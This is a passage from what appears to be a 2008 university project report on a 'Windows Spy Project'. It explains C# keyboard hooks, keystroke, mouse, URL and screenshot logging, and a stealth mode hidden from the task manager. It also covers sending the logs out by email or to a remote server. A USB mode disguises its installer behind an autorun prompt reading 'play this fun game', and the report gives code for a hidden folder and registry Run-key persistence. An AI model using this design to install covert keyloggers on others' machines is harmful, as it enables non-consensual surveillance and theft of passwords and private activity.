.Auto, SetLastError =
true
)]

[
return
:
MarshalAs
(
UnmanagedType
.Bool)]

public

static

extern

bool

UnhookWindowsHookEx(
IntPtr

hh
k);

and now we can use these functions as regular static methods of the Win32API class.





Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


21

Example of setting a hook in C#

After importing the necessary

functions
-


Setting the hook:

using

(Process curProcess = Process.GetCurrentProcess())

using

(Proces
sModule curModule = curProcess.MainModule)

{

hookID = win32API.SetWindowsHookEx(WH_KEYBOARD_LL, CALLBACK,
win32API.GetModuleHandle(curModule.ModuleName), 0);

}

The CALLBACK parameter is the pointer to the handle function.
In C#, the "pointer"
is achieved
by passing an instance of a delegate type, referring to the appropriate
method.
This is the method that will be called every time the hook is used.

An important point to note here is that the delegate instance needs to be stored in a
member variable in the

class. This is to prevent it being garbage collected as soon as
the first method call ends.

As mentioned above, SetWindowsHookEx requires a pointer to the callback function
that will be used to process the keyboard events. It expects a function with the
f
ollowing signature:

LRESULT CALLBACK LowLevelKeyboardProc

(
int

nCode,

WPARAM wParam, LPARAM lParam);

The C# method for setting up a "pointer to a function" is to use a delegate, so the first
step in giving SetWindowsHookEx what it needs is to declare a de
legate with the
right signature:

Private

delegate

IntPtr

HookHandlerDelegate

(
int

nCode,
IntPtr

wParam,
ref

KBDLLHOOKSTRUCT lParam);


And then write a callback method with the same signature, for example




private

IntPtr

HookCallback

(
int

nCode,
IntPtr

wParam,
ref

KBDLLHOOKSTRUCT lParam)


nCode
: the callback function should return the result of CallNextHookEx if this value
is less than zero. Normal keyboard events will return an nCode of 0 or more.

wParam
: This value indicates what type of event occurr
ed: key up or key down, and
whether the key pressed was a system key (left or right
-
hand Alt keys).

lParam
: A structure to store precise information on the keystroke, such as the code of
the key which was pressed. The structure is as follows:



Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


22

private

s
truct

KBDLLHOOKSTRUCT

{


public

int

vkCode;


int

scanCode;


public

int

flags;


int

time;



int

dwExtraInfo;

}

The two public parameters are the only ones used by the callback method in

vkCode

returns the virtual key code
, while flags indicates if this is an extended key (the
Windows Start key, for instance) or if the Alt key was pressed at the same time.

So this parameter is important to retrieve the information of the message we grabbed.


(Don't forget to use
"
CallNextHo
okEx(hookID, nCode, wParam,
ref

lParam);
"

in the
function)

of course to complete the "pointing" you must create an instance of your delegate



private

HookHandlerDelegate proc;

and to link between the instance and the function

proc =
new

HookHandlerDeleg
ate(HookCallback);

finally, we must free the hook before exiting from the application:

UnhookWindowsHookEx(hookID)


This way we were able to intercept any key pressed or ant mouse click and to use it in
the different occasions we neede to



Making the K
eyLogger and MouseLogger obviously, as well as using this in the URL
Hook, password checking, activity checking and more (each will be explained in the
proper section)
















Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


23

Client

Application running

Mode

The main idea of the Spy Application is
to monitor a computer. In this subchapter,
we'll put our effort on describing the main options on the application.

Settings

When you first run the program, the application window appears when the tab
"Settings" is the one on top, as seen in the Figure:


Figure

Settings, as can be understood from it's name, is the tab where one can set the main
options of the application and of course, initiate the monitoring. An important notice
is that before starting, one should examine and change the other tabs super
vising a
specific monitoring option rather than rely on the default options.

In the next sections, we shall describe the option which available under the settings
bar.

Stealth Mode

As explain earlier, the main idea of the application is to monitor ones c
omputer. The
option to run in stealth mode means that the application runs on ones computer
without any form appearing on the screen (and without noticing in the application
manager), in other words the application becomes invisible. In order to stop the
m
onitoring in stealth mode, one must choose under the settings tab 2 mandatory
options:

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


24



Key Combination: after starting the application, several key strokes that match
the key combination that was inserted trigger a password window, which will
be the gate
for the closure of the application.



Password: in the password window, the password inserted is to be matched
with the one under the settings tab (which is hidden), a correct password wil
stop the monitoring and will open the form of the application.

Star
ting and Stopping Time

When starting the monitoring, there are several options regarding the beginning and
the ending of the monitoring:



Immediate: one can choose to initiate the monitoring ass soon as he push the
Start button. The ending will be initiated

by him, as explained in earlier
sections.



Preordered: this secondary option allows the user to start the application and
ending it in a specific time, chosen by him.


















Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


25

Key Logger

This tab supervises the key logging option. The general ide
a of key logging is that the
key strokes of the monitored user are saved on a log file (in this application's case a
*.html file) invisible to him. When choosing the tab "Key Logger", a window similar
to
the
figure appears:

Figure

In the followed sectio
n we shall describe the varsity of options that this tab offers.

Options

When entering the addressed tab, one can choose either to perform key logging or not.
If one chooses to perform key logging, he may choose to perform this action on
several applicatio
ns (meaning that the monitoring will be only on these selected
programs) or to perform general key logging, transmitting into the log file any
gathered keyboard information. One can also choose where to place the log files, this
action is not mandatory for

a default path is already marked.

Log File

When the monitoring starts, an html file serves as a log file, and saves all of the
keystrokes. The log file can be seen below:

Process Name: explorer

Window Name: Release

28/03/2008 22:07:51

hello world!

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


26

The
log file prints for any application in which a key was pressed the following:



Process name



Window name



Time of the first keystroke

As one can obviously understand, the user typed the words "hello world" in
28/03/2008 22:07:51
, in the process explorer.






















Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


27

Mouse Logger

This tab supervises the mouse logging option. The general idea of mouse logging is
that the mouse strokes of the monitored user are saved on a log file (in this
application's case a *.html file) invisible to him. When talkin
g about mouse logging,
we generally mean saving all of the right clicks the user pressed with the mouse.

When choosing the tab "Mouse Logger", a window similar to figure appears:

Figure

In the followed section we shall describe the varsity of options t
hat this tab offers.

Options

When entering the addressed tab, one can choose either to perform mouse logging or
not. If one chooses to perform mouse logging, he may choose to perform this action
on several applications (meaning that the monitoring will be
only on these selected
programs) or to perform general mouse logging, transmitting into the log file any
gathered mouse information. One can also choose where to place the log files, this
action is not mandatory for a default path is already marked.




Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


28

Lo
g File

When the monitoring start, an html file serves as a log file, and saves all of the right
mouse clicks. The log file can be seen below:

Process Name: explorer

Window Name: Release

28/03/2008 22:07:48

Clicked spot is
-

496, 53

Clicked spot is
-

496, 5
3

The log file prints for any application in which the user clicked on a mouse the
following:



Process name



Window name



Time of the first right click

As one can obviously understand, the user clicked the mouse
in 28/03/2008 22:07:48,
in the process explor
er.















Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


29

URL Logger

This tab supervises the URL logging option. The general idea of URL logging is that
the various websites visited by the monitored user are saved on a log file (in this
application's case a *.html file) invisible to him.

When
choosing the tab "URL Logger", a window similar to figure appears:

Figure

In the followed section we shall describe the varsity of options that this tab offers.

Options

When entering the addressed tab, one can choose either to perform URL logging or
not
. One can choose where to place the log files, this action is not mandatory for a
default path is already marked.






Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


30

Log File

When the monitoring starts, an html file serves as a log file, and save all of the
websites visited by the monitored user. The
log file can be seen below:

28/03/2008 22:07:48

http://www.walla.co.il

28/03/2008 22:10:34

http://www.ynet.co.il

The log file saves for each website visited the hour and date o
f entrance, and of course
the address of the website.

Image Recorder

This tab supervises the image recording option. The general idea of image recording
is to create screenshots, in several ways, selected by the user.

When choosing the tab "Image Recorde
r", a window similar to figure appears:

Figure

In the followed section we shall describe the varsity of options that this tab offers.



Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


31

Options

When entering the addressed tab, one can choose either to perform Image Recording
or not. One can choose wher
e to place the log files, this action is not mandatory for a
default path is already marked.

There are 2 main ways to record an image, they can be combined together:



Time Intervals: choosing this option, a snapshot of the user's screen will be
taken ever
y several minutes, chosen by the user.



Dangerous Key Strokes: whenever a selected key combination is pressed, a
snapshot is taken.

Screenshots

The screenshots are saved as *.jpg files in the mentioned directory.

Remoting

This is the main tab for communic
ation. By contrast to the other tabs, this tab doesn't
supervise any logging done by the user, its sole purpose is to handle communication
with the outer world.

When choosing the tab "Remoting", a window similar to figure appears:

Figure


Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


32

Options

The r
emote section includes 2 features:



Initiate Communication: this option connects to a server, with an IP address or
local name, as described by the user. This option will be discussed broadly in
further sections.



Send Email: this option sends all of the i
nformation (log files and screenshots)
gathered from the user, and sends it to a user typed email address from our
own application's gmail account.




















Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


33

Client &
Server
Application running
Mode

While most of the work can be done locally, it
is advised to work through a remote
server, in order to do a truly stealth monitoring. In this subchapter, we'll put our effort
on describing the remote options of our application.

Client

As described in earlier sections, when choosing the tab "Remoting",

a window similar
to figure

appears:

Figure

In order to initiate communication with a remote server, one must enter an IP address
or local name. Once the information inserted the application searches for such server
and starts a connection with it. Once

succeeded, the form becomes invisible and the
server has the control for monitoring.






Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


34

Server

This section describes a form, opened in a remote computer, waiting for an
initialization request from a client. When starting the server application, it star
ts
listening to requests and no form appears. Once the server gets a request from a
remote client, the form appears on the screen:

The application server's from can be seen in figure below:

Figure

The form allows us to contro
l the monitoring remotely, the next sections intend to
explain the various options which can be done remotely using the server application.

Enable and Disable

To start monitor the remote user, one should press the button "Enable" which enables
all of the
monitoring described by the user early on in the client's form. If one chooses
to disable the monitoring for some time, he may press "Disable".

Sending the Files

The files (meaning the log files and screenshots) can be sent from the remote client,
the file
s are sent separately, sending in each time the files which the user mentioned.

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


35

Ending the Monitoring

Whenever the user chooses, he can terminate the spy application at the client's
computer.

Sending Email

The user can send an email to his email account
via the application gmail account
rather than sending it directly.

Status

The user can detect whether the remote computer is used or not. The status of the
monitored computer Busy/Idle can be seen in the form after the request is sent.






















Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


36

USB Spying Mode


This third running mode is considered to be the most advanced one


the true and fast
spying technique on any accessible PC.

For this purpose the following files are needed: autorun.inf,

lilguy.ico, appinstall.exe,
svcshost
.exe
,

server
2.exe. Also, you must have a disk on key device to hold these
files.

Description:

We wanted to allow the user to be able to make a quick install of the software on any
computer, and making the software completely hidden, and controlled by the server
runnin
g on the user’s computer.

This feature allows the user to approach any PC, insert the disk on key device
containing the files mentioned, and with a single click, install the software on the
computer, making it load and run (completely hidden) upon compute
r start
-
up (as
well as immediately upon doing inserting the device and choosing the correct option),
and connecting to the remote server that the user runs on his private computer.

How it is done:

Autorun.inf



The Autorun.inf file must always be located i
n the root directory of your disk on key
device

This feature to automatically start programs on compact discs / disk on keys is
sometimes referred as the Windows AutoRun technology.

When you insert the disc Windows will look after Autorun.inf in the root d
irectory
and if it find it, it will read the file and interpret the contents of it.

We wrote in the Autorun.inf the following script:

[autorun]

icon=lilguy.ico

open=appinstall.exe

action=Click “OK” to play this fun game!

shell
\
open
\
command=appinstall.exe



What it does is when the pop
-
up window the pops up when ever you insert the disk
appears, there is one additional option there (has the lilguy.ico icon besides it with the
text of the “action”, snapshot can be seen at next page) that when you click it (a
nd
then click “OK”), the computer runs the appinstall.exe file (to be explained later)
which is as we recall located on the disk as well.

The last command in the file enables to run the appinstall.exe in another way:

If you press cancel in the pop
-
up windo
w, and then go to My computer and double
click the disk
-
on
-
key drive there, the appinstall.exe also executes.







Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


37


Appinstall.exe

This application does the following things:

It creates an empty hidden folder with the path “My documents
\
Files” (for each
computer “My documents” will be automatically replaced by the local computer’s
path to “My documents”).


string

new_directory =
Environment
.GetFolderPath(
Environment
.
SpecialFolder
.MyDocuments);

new_directory +=
@"
\
Files"
;


System.IO.
Directory
.CreateDirecto
ry(new_directory);

DirectoryInfo

d =
new

DirectoryInfo
(new_directory);

d.Attributes = d.Attributes |
FileAttributes
.Hidden;


This is the folder which contains all the information produced by the spying
application.

Then, it copies the files “HOOK.exe”, “i
nit.txt” (to be explained) to that directory.


string

CurrentPath = System.Windows.Forms.
Application
.StartupPath;


File
.Copy(CurrentPath +
@"
\
HOOK.exe"
,
Environment
.GetFolderPath(
Environment
.
SpecialFolder
.MyDocuments) +
@"
\
Files
\
HOOK.exe"
);


File
.Copy(Curr
entPath +
@"
\
init.txt"
,
Environment
.GetFolderPath(
Environment
.
SpecialFolder
.MyDocuments) +
@"
\
Files
\
init.txt"
);


Afterwards, it changes the registry of the local computer so each time the reboots, our
application will run as soon as windows loads.

Explana
tion of this last feature:

Windows Registry is a
directory

which stores settings and options for the
operating
system

for
Microsoft Windows
. It contains information and settings for all the
hardware
, operating system
software
, most non
-
operating system

software, users,
Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


38

preferences of the
PC
, etc. Whenever a user makes changes to
Control Panel

settings,
file associations
, system policies, or most
installed

software, the changes are reflected
and stored in the registry. The registry
also provides

a window into the operation of
the kernel, exposing runtime information such as performance counters and currently
active hardware.

To see the registry you can got t Start
-
>Run and write “regedit”.

The list of the applications the start as so
on as windows load is located in:

HKEY_LOCAL_MACHINE
-
>SOFTWARE
-
>Microsoft
-
>Windows
-
>

CurrentVersion
-
>Run.

The code lines (2 lines) that add our application (after being copied to the local
computer) to this list are




RegistryKey

rkApp =
Registry
.LocalMa
chine.OpenSubKey(
"SOFTWARE
\
\
Microsoft
\
\
Windows
\
\
CurrentVersion
\
\
Run"
,
true
);


rkApp.SetValue(
"HOOK"
,
Environment
.GetFolderPath(
Environment
.
SpecialFolder
.MyDocuments) +
"
\
\
Files
\
\
HOOK.exe"
);


And finally the appinstall.exe runs the HOOK.exe application (ou
r spy software)




Process.Start(
Environment
.GetFolderPath(
Environment
.
SpecialFolder
.MyDocuments)
+
@"
\
Files
\
HOOK.exe"
);


*don’t forget

using

System.Diagnostics;

using

Microsoft.Win32;

Init.txt

In this spying technique, we support 2 running modes. One,
each time the computer
restarts the application starts running on it’s own, without connecting to the server.
Two, each time the application starts (on computer start
-
up and of course on the first
run right after the install) it immediately connects to our

server running on the user’s
computer.

This is the purpose of the ini.txt file (which must co on the disk as well): if it is
empty,

Then the application will run in the first mode, else


you should right the name of
your computer host which runs the ser
ver (or it’s ip number, in this case the format
should be “ip insert_number”),

And this way the application will connect to the server (specified in the init.txt file)
each time it loads.












Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


39

Client
Implementation techniques & Code

Key Logger

When a
ddressing the description of the implementation, we firstly need to install the
low level keyboard hook which will intercept all of the keystrokes. After completing
this stage, we shall describe the key logging.

Initializing Keyboard Hook

In order to init
iate the hook, we need to address 3 methods in
user32.dll
:



SetWindowsHookEx
which sets up the keyboard hook



UnhookWindowsHookEx w
hich removes the keyboard hook



CallNextHookEx w
hich passes the keystroke information to the next
application listening for ke
yboard events

In order to achieve this, the first step is to include the
System.Runtime.InteropServices
namespace and import the API methods, starting
with

SetWindowsHookEx.

We used a class for imported
methods, called